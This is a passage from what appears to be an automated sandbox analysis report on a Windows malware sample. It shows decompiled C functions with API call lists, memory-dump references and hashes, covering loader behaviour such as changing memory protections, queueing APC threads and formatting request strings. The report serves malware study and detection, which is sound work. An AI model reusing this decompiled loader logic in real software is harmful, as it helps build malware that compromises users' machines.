                                                                                                                                  								_t43 = E022B50E8(); // executed
                                                                                                                                  								__eflags = _t43;
                                                                                                                                  								if(_t43 != 0) {
                                                                                                                                  									__eflags = _v8;
                                                                                                                                  									_t65 = _v12;
                                                                                                                                  									if(_v8 != 0) {
                                                                                                                                  										L29:
                                                                                                                                  										_t44 = E022B7C3D(_t61, _t65, _v8); // executed
                                                                                                                                  										_t54 = _t44;
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t65;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									_t54 = E022B46B2(__eflags,  &(_t65[4]));
                                                                                                                                  									__eflags = _t54;
                                                                                                                                  									if(_t54 == 0) {
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									goto L29;
                                                                                                                                  								}
                                                                                                                                  								_t54 = 8;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t66 = _v12;
                                                                                                                                  						if(_t66 == 0) {
                                                                                                                                  							L30:
                                                                                                                                  							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                  								 *0x22bd15c();
                                                                                                                                  							}
                                                                                                                                  							goto L34;
                                                                                                                                  						}
                                                                                                                                  						_t67 =  &(_t66[4]);
                                                                                                                                  						do {
                                                                                                                                  						} while (E022B8B7B(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                  					}
                                                                                                                                  					goto L30;
                                                                                                                                  				} else {
                                                                                                                                  					_t54 = _t22;
                                                                                                                                  					L34:
                                                                                                                                  					return _t54;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B59A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,022B2F89,00000000,00000000), ref: 022B59B3
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 022B3006
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • memset.NTDLL ref: 022B3055
                                                                                                                                  • RtlInitializeCriticalSection.NTDLL(04779570), ref: 022B3066
                                                                                                                                    • Part of subcall function 022B46B2: memset.NTDLL ref: 022B46C7
                                                                                                                                    • Part of subcall function 022B46B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 022B4709
                                                                                                                                    • Part of subcall function 022B46B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 022B4714
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 022B3091
                                                                                                                                  • wsprintfA.USER32 ref: 022B30C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4246211962-0
                                                                                                                                  • Opcode ID: 0e04faf9c58a4bf127444849ee6e5c254d6b2f8934bf5fb92243ce0b3c099ed4
                                                                                                                                  • Instruction ID: 394360f8583ef59410cba8dc8765918e39cf569d04634a657d5832f2130b50b0
                                                                                                                                  • Opcode Fuzzy Hash: 0e04faf9c58a4bf127444849ee6e5c254d6b2f8934bf5fb92243ce0b3c099ed4
                                                                                                                                  • Instruction Fuzzy Hash: 6C51F075E70315ABDB23EBE4EC88BEE73A8AF08784F044865E501D7259EBB08554CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                  			E022B2D74(signed int __eax, signed int _a4, signed int _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				intOrPtr _t81;
                                                                                                                                  				char _t83;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t97;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				char _t101;
                                                                                                                                  				unsigned int _t102;
                                                                                                                                  				intOrPtr _t103;
                                                                                                                                  				char* _t107;
                                                                                                                                  				signed int _t110;
                                                                                                                                  				signed int _t113;
                                                                                                                                  				signed int _t118;
                                                                                                                                  				signed int _t122;
                                                                                                                                  				intOrPtr _t124;
                                                                                                                                  
                                                                                                                                  				_t102 = _a8;
                                                                                                                                  				_t118 = 0;
                                                                                                                                  				_v20 = __eax;
                                                                                                                                  				_t122 = (_t102 >> 2) + 1;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_a8 = 0;
                                                                                                                                  				_t81 = E022B1525(_t122 << 2);
                                                                                                                                  				_v16 = _t81;
                                                                                                                                  				if(_t81 == 0) {
                                                                                                                                  					_push(8);
                                                                                                                                  					_pop(0);
                                                                                                                                  					L37:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_t107 = _a4;
                                                                                                                                  				_a4 = _t102;
                                                                                                                                  				_t113 = 0;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t83 =  *_t107;
                                                                                                                                  					if(_t83 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					if(_t83 == 0xd || _t83 == 0xa) {
                                                                                                                                  						if(_t118 != 0) {
                                                                                                                                  							if(_t118 > _v8) {
                                                                                                                                  								_v8 = _t118;
                                                                                                                                  							}
                                                                                                                                  							_a8 = _a8 + 1;
                                                                                                                                  							_t118 = 0;
                                                                                                                                  						}
                                                                                                                                  						 *_t107 = 0;
                                                                                                                                  						goto L16;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t118 != 0) {
                                                                                                                                  							L10:
                                                                                                                                  							_t118 = _t118 + 1;
                                                                                                                                  							L16:
                                                                                                                                  							_t107 = _t107 + 1;
                                                                                                                                  							_t15 =  &_a4;
                                                                                                                                  							 *_t15 = _a4 - 1;
                                                                                                                                  							if( *_t15 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t113 == _t122) {
                                                                                                                                  							L21:
                                                                                                                                  							if(_a8 <= 0x20) {
                                                                                                                                  								_push(0xb);
                                                                                                                                  								L34:
                                                                                                                                  								_pop(0);
                                                                                                                                  								L35:
                                                                                                                                  								E022B8B22(_v16);
                                                                                                                                  								goto L37;
                                                                                                                                  							}
                                                                                                                                  							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                                                                                                  							_t103 = E022B1525((_v8 + _t24) * _a8 + 4);
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_push(8);
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t90 = _a8;
                                                                                                                                  							_a4 = _a4 & 0x00000000;
                                                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                                                  							_t124 = _t103 + _t90 * 4;
                                                                                                                                  							if(_t90 <= 0) {
                                                                                                                                  								L31:
                                                                                                                                  								 *0x22bd278 = _t103;
                                                                                                                                  								goto L35;
                                                                                                                                  							}
                                                                                                                                  							do {
                                                                                                                                  								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                                                                                                  								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                                                                                                  								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                                                                                                  								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                                                                                                  								_v12 = _v12 & 0x00000000;
                                                                                                                                  								if(_a4 <= 0) {
                                                                                                                                  									goto L30;
                                                                                                                                  								} else {
                                                                                                                                  									goto L26;
                                                                                                                                  								}
                                                                                                                                  								while(1) {
                                                                                                                                  									L26:
                                                                                                                                  									_t99 = _v12;
                                                                                                                                  									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                                                                                                  									if(_t99 == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									_v12 = _v12 + 1;
                                                                                                                                  									if(_v12 < _a4) {
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  								_v8 = _v8 - 1;
                                                                                                                                  								L30:
                                                                                                                                  								_t97 = _a4;
                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                  								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                                                                                                  								__imp__(_t124);
                                                                                                                                  								_v8 = _v8 + 1;
                                                                                                                                  								_t124 = _t124 + _t97 + 1;
                                                                                                                                  							} while (_v8 < _a8);
                                                                                                                                  							goto L31;
                                                                                                                                  						}
                                                                                                                                  						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                                                                                                  						_t101 = _t83;
                                                                                                                                  						if(_t83 - 0x61 <= 0x19) {
                                                                                                                                  							_t101 = _t101 - 0x20;
                                                                                                                                  						}
                                                                                                                                  						 *_t107 = _t101;
                                                                                                                                  						_t113 = _t113 + 1;
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				if(_t118 != 0) {
                                                                                                                                  					if(_t118 > _v8) {
                                                                                                                                  						_v8 = _t118;
                                                                                                                                  					}
                                                                                                                                  					_a8 = _a8 + 1;
                                                                                                                                  				}
                                                                                                                                  				goto L21;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • lstrcpy.KERNEL32(69B25F45,00000020), ref: 022B2E71
                                                                                                                                  • lstrcat.KERNEL32(69B25F45,00000020), ref: 022B2E86
                                                                                                                                  • lstrcmp.KERNEL32(00000000,69B25F45), ref: 022B2E9D
                                                                                                                                  • lstrlen.KERNEL32(69B25F45), ref: 022B2EC1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3214092121-3916222277
                                                                                                                                  • Opcode ID: 10717efda2dc03e7ec4ece4561b305f3f90d4e42b6e7e2f76c9f03f9fecf7b1f
                                                                                                                                  • Instruction ID: ad1fabc8df9a8942bb2f9864647107c80ee0ff30682b6c19f04c32470f59e2d2
                                                                                                                                  • Opcode Fuzzy Hash: 10717efda2dc03e7ec4ece4561b305f3f90d4e42b6e7e2f76c9f03f9fecf7b1f
                                                                                                                                  • Instruction Fuzzy Hash: 4E51B375A1020AEBDF12DFD9C8847EDBBB5FF55384F04825AEC159B209C770AA51CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_() {
                                                                                                                                  				void* _t1;
                                                                                                                                  				int _t4;
                                                                                                                                  				int _t6;
                                                                                                                                  
                                                                                                                                  				_t6 = 0;
                                                                                                                                  				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                  				 *0x4030e0 = _t1;
                                                                                                                                  				if(_t1 != 0) {
                                                                                                                                  					 *0x4030f0 = GetModuleHandleA(0);
                                                                                                                                  					GetCommandLineW(); // executed
                                                                                                                                  					_t4 = E004019A0(); // executed
                                                                                                                                  					_t6 = _t4;
                                                                                                                                  					HeapDestroy( *0x4030e0);
                                                                                                                                  				}
                                                                                                                                  				ExitProcess(_t6);
                                                                                                                                  			}







                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401D42
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00401D52
                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 00401D5D
                                                                                                                                    • Part of subcall function 004019A0: NtQuerySystemInformation.NTDLL ref: 004019DF
                                                                                                                                    • Part of subcall function 004019A0: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A26
                                                                                                                                    • Part of subcall function 004019A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A55
                                                                                                                                    • Part of subcall function 004019A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00401A73
                                                                                                                                    • Part of subcall function 004019A0: CreateThread.KERNEL32 ref: 00401A9D
                                                                                                                                    • Part of subcall function 004019A0: QueueUserAPC.KERNEL32(004013C4,00000000,?,?,00000000), ref: 00401AB9
                                                                                                                                  • HeapDestroy.KERNEL32 ref: 00401D70
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401D77
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2501132232-0
                                                                                                                                  • Opcode ID: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
                                                                                                                                  • Instruction ID: 05a8c36faf6c528b4ee69dbfea55c2bb6b45a73a18d0234de67205c8428d1488
                                                                                                                                  • Opcode Fuzzy Hash: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
                                                                                                                                  • Instruction Fuzzy Hash: B5E0B6709027209BC3212F71AF0DB4B3E68BF057927044536F606F22B4D7B84500CAAD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B5319(void* __edx) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				int _v12;
                                                                                                                                  				WCHAR* _v16;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t23;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				void* _t26;
                                                                                                                                  				intOrPtr _t32;
                                                                                                                                  				intOrPtr _t35;
                                                                                                                                  				void* _t37;
                                                                                                                                  				intOrPtr _t38;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				void* _t45;
                                                                                                                                  				void* _t50;
                                                                                                                                  				void* _t52;
                                                                                                                                  
                                                                                                                                  				_t50 = __edx;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t23 = E022B155A(0,  &_v8); // executed
                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t24 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t4 = _t24 + 0x22bedc0; // 0x4779368
                                                                                                                                  				_t5 = _t24 + 0x22bed68; // 0x4f0053
                                                                                                                                  				_t26 = E022B5D79( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                  				_t45 = _t26;
                                                                                                                                  				if(_t45 == 0) {
                                                                                                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                  					_t45 = 8;
                                                                                                                                  					if(_v12 < _t45) {
                                                                                                                                  						_t45 = 1;
                                                                                                                                  						__eflags = 1;
                                                                                                                                  					} else {
                                                                                                                                  						_t32 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t11 = _t32 + 0x22bedb4; // 0x477935c
                                                                                                                                  						_t48 = _t11;
                                                                                                                                  						_t12 = _t32 + 0x22bed68; // 0x4f0053
                                                                                                                                  						_t52 = E022B272D(_t11, _t12, _t11);
                                                                                                                                  						_t59 = _t52;
                                                                                                                                  						if(_t52 != 0) {
                                                                                                                                  							_t35 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  							_t13 = _t35 + 0x22bedfe; // 0x30314549
                                                                                                                                  							_t37 = E022B5B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                                                                                                  							if(_t37 == 0) {
                                                                                                                                  								_t61 =  *0x22bd25c - 6;
                                                                                                                                  								if( *0x22bd25c <= 6) {
                                                                                                                                  									_t42 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  									_t15 = _t42 + 0x22bec0a; // 0x52384549
                                                                                                                                  									E022B5B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							_t38 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  							_t17 = _t38 + 0x22bedf8; // 0x47793a0
                                                                                                                                  							_t18 = _t38 + 0x22bedd0; // 0x680043
                                                                                                                                  							_t45 = E022B4538(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                                  							HeapFree( *0x22bd238, 0, _t52);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0x22bd238, 0, _v16);
                                                                                                                                  				}
                                                                                                                                  				_t54 = _v8;
                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                  					E022B4FF0(_t54);
                                                                                                                                  				}
                                                                                                                                  				return _t45;
                                                                                                                                  			}




















                                                                                                                                  APIs
                                                                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04779368,00000000,?,74E5F710,00000000,74E5F730), ref: 022B5368
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,047793A0,?,00000000,30314549,00000014,004F0053,0477935C), ref: 022B5405
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022B7CCB), ref: 022B5417
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 728aaccda8b527bf92703ef35125427e34f8412c39f94c6310cb5dfc51d4aba1
                                                                                                                                  • Instruction ID: 98d1f4b3650a387a3c838bb56fcd9b18638ac0500b65e1f2b7ddfcec65256de3
                                                                                                                                  • Opcode Fuzzy Hash: 728aaccda8b527bf92703ef35125427e34f8412c39f94c6310cb5dfc51d4aba1
                                                                                                                                  • Instruction Fuzzy Hash: 0E31AC72D10249BFDB13ABD0EC88EDABBBDEF44340F560166F501AB165D7B09A64CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E022B2C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* _t13;
                                                                                                                                  				intOrPtr _t18;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t30;
                                                                                                                                  				void* _t36;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  
                                                                                                                                  				_t36 = __edx;
                                                                                                                                  				_t32 = __ecx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t42 =  *0x22bd340; // 0x4779c08
                                                                                                                                  				_push(0x800);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push( *0x22bd238);
                                                                                                                                  				if( *0x22bd24c >= 5) {
                                                                                                                                  					_t13 = RtlAllocateHeap(); // executed
                                                                                                                                  					if(_t13 == 0) {
                                                                                                                                  						L6:
                                                                                                                                  						_t30 = 8;
                                                                                                                                  						L7:
                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                  							L10:
                                                                                                                                  							 *0x22bd24c =  *0x22bd24c + 1;
                                                                                                                                  							L11:
                                                                                                                                  							return _t30;
                                                                                                                                  						}
                                                                                                                                  						_t44 = _a4;
                                                                                                                                  						_t40 = _v8;
                                                                                                                                  						 *_a16 = _a4;
                                                                                                                                  						 *_a20 = E022B2C0D(_t44, _t40);
                                                                                                                                  						_t18 = E022B31A8(_t40, _t44);
                                                                                                                                  						if(_t18 != 0) {
                                                                                                                                  							 *_a8 = _t40;
                                                                                                                                  							 *_a12 = _t18;
                                                                                                                                  							if( *0x22bd24c < 5) {
                                                                                                                                  								 *0x22bd24c =  *0x22bd24c & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						_t30 = 0xbf;
                                                                                                                                  						E022B5433();
                                                                                                                                  						HeapFree( *0x22bd238, 0, _t40);
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					_t24 = E022B9BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                  					L5:
                                                                                                                                  					_t30 = _t24;
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				if(RtlAllocateHeap() == 0) {
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				_t24 = E022B5450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                                                                                                                  				goto L5;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 022B2C7C
                                                                                                                                    • Part of subcall function 022B5450: GetTickCount.KERNEL32 ref: 022B5464
                                                                                                                                    • Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B54B4
                                                                                                                                    • Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B54D1
                                                                                                                                    • Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B54FD
                                                                                                                                    • Part of subcall function 022B5450: HeapFree.KERNEL32(00000000,?), ref: 022B550F
                                                                                                                                    • Part of subcall function 022B5450: wsprintfA.USER32 ref: 022B5530
                                                                                                                                    • Part of subcall function 022B5450: HeapFree.KERNEL32(00000000,?), ref: 022B5540
                                                                                                                                    • Part of subcall function 022B5450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 022B556E
                                                                                                                                    • Part of subcall function 022B5450: GetTickCount.KERNEL32 ref: 022B557F
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 022B2C9A
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000002,022B7D16,?,022B7D16,00000002,?,?,022B312C,?), ref: 022B2CF7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1676223858-8415677
                                                                                                                                  • Opcode ID: ded4eb249a3008c351d335abcf14393a5f384769ac6ef59d4794b1162aeecbba
                                                                                                                                  • Instruction ID: 59aa7cbb96305dcafe29ad61dccf8a37b6b242ffbbe3480c0a62eeefdbf8be5b
                                                                                                                                  • Opcode Fuzzy Hash: ded4eb249a3008c351d335abcf14393a5f384769ac6ef59d4794b1162aeecbba
                                                                                                                                  • Instruction Fuzzy Hash: AB214A75660209EBC7039FD8EC48BDA37ACEF48395F014526FE019A255D7B0A9548F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E00401BAE(void* __eax, void* _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				int _t43;
                                                                                                                                  				long _t54;
                                                                                                                                  				signed int _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				signed int _t60;
                                                                                                                                  
                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                  				_t57 =  *0x403100;
                                                                                                                                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				if(_v16 <= 0) {
                                                                                                                                  					L12:
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					goto L1;
                                                                                                                                  				}
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t60 = _v12;
                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					asm("bt [esi+0x24], eax");
                                                                                                                                  					if(_t60 >= 0) {
                                                                                                                                  						asm("bt [esi+0x24], eax");
                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                  							L8:
                                                                                                                                  							_t54 = _t57 - 0x69b25f40;
                                                                                                                                  							L9:
                                                                                                                                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                  							if(_t43 == 0) {
                                                                                                                                  								_v12 = GetLastError();
                                                                                                                                  							}
                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                  							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                                                                                                  							if(_v8 < _v16) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								goto L12;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						asm("bt [esi+0x24], eax");
                                                                                                                                  						_t54 = _t57 - 0x69b25f42;
                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                  							goto L9;
                                                                                                                                  						}
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					asm("bt [esi+0x24], eax");
                                                                                                                                  					if(_t60 >= 0) {
                                                                                                                                  						_t54 = _t57 - 0x69b25f24;
                                                                                                                                  					} else {
                                                                                                                                  						_t54 = _t57 - 0x69b25f04;
                                                                                                                                  					}
                                                                                                                                  					goto L9;
                                                                                                                                  				}
                                                                                                                                  				goto L12;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401C5C
                                                                                                                                  • GetLastError.KERNEL32 ref: 00401C62
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$ErrorLast
                                                                                                                                  • String ID: `gt
                                                                                                                                  • API String ID: 1469625949-3560540215
                                                                                                                                  • Opcode ID: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
                                                                                                                                  • Instruction ID: b2c716a2ba88aaf16e81d6a071de259e4f48580833c7ea43561533825924546f
                                                                                                                                  • Opcode Fuzzy Hash: e200ab23c86fef14a09755118c0811a6a082a578495e72e8b41036a9ef0c01c2
                                                                                                                                  • Instruction Fuzzy Hash: EB215C7180420ADFDB18DF95C985ABAF7F4FB18345F01446AD602E7168E3B8EA64CB58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 022B8A76
                                                                                                                                  • SysAllocString.OLEAUT32(022B4BD8), ref: 022B8ABA
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B8ACE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B8ADC
